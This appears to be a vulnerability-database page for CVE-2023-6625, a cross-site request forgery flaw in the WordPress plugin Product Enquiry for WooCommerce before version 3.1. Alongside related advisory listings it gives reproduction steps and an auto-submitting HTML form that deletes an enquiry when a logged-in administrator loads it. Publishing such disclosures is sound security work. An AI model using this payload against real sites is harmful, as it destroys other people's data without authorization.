Lucene search
+L

Product Enquiry for WooCommerce < 3.1 - Arbitrary Enquiry Deletion via CSRF

🗓️ 28 Dec 2023 00:00:00Reported by Bob MatyasType 
wpexploit
 wpexploit
👁 167 Views

Arbitrary Enquiry Deletion via CSRF in WooCommerce

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2023-6625
22 Jan 202421:31
circl
cnnvd
CNNVD
WordPress plugin Product Enquiry for WooCommerce Security Vulnerability
22 Jan 202400:00
cnnvd
cve
CVE
CVE-2023-6625
22 Jan 202419:14
cve
cvelist
Cvelist
CVE-2023-6625 Product Enquiry for WooCommerce < 3.1 - Arbitrary Enquiry Deletion via CSRF
22 Jan 202419:14
cvelist
euvd
EUVD
EUVD-2023-58848
3 Oct 202520:07
euvd
nvd
NVD
CVE-2023-6625
22 Jan 202420:15
nvd
osv
OSV
CVE-2023-6625
22 Jan 202420:15
osv
prion
Prion
Cross site request forgery (csrf)
22 Jan 202420:15
prion
ptsecurity
Positive Technologies
PT-2024-15028 · WordPress · Product Enquiry For Woocommerce
22 Jan 202400:00
ptsecurity
redhatcve
RedhatCVE
CVE-2023-6625
23 May 202504:57
redhatcve
Rows per page
1. Make an enquiry from the frontend form
2. Go to "Woo Quote Popup > Enquiry List"
3. Get the ID of an item
4. Add the ID to the following HTML:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=GMWQP&view=list" method="POST">
        <input type="text" name="action" value="delete">
        <input type="text" name="action2" value="delete">
        <input type="text" name="page" value="GMWQP">
        <input type="text" name="_wp_http_referer" value="%2Fwp-admin%2Fadmin.php%3Fpage%3DGMWQP%26view%3Dlist">       
        <input type="text" name="id[]" value="__ADD_ID_HERE__">        
        <input type="submit" value="submit">
    </form>
</body>
```
5. See that the item has been deleted.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Dec 2023 00:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 3.14.3
EPSS0.00203
SSVC
167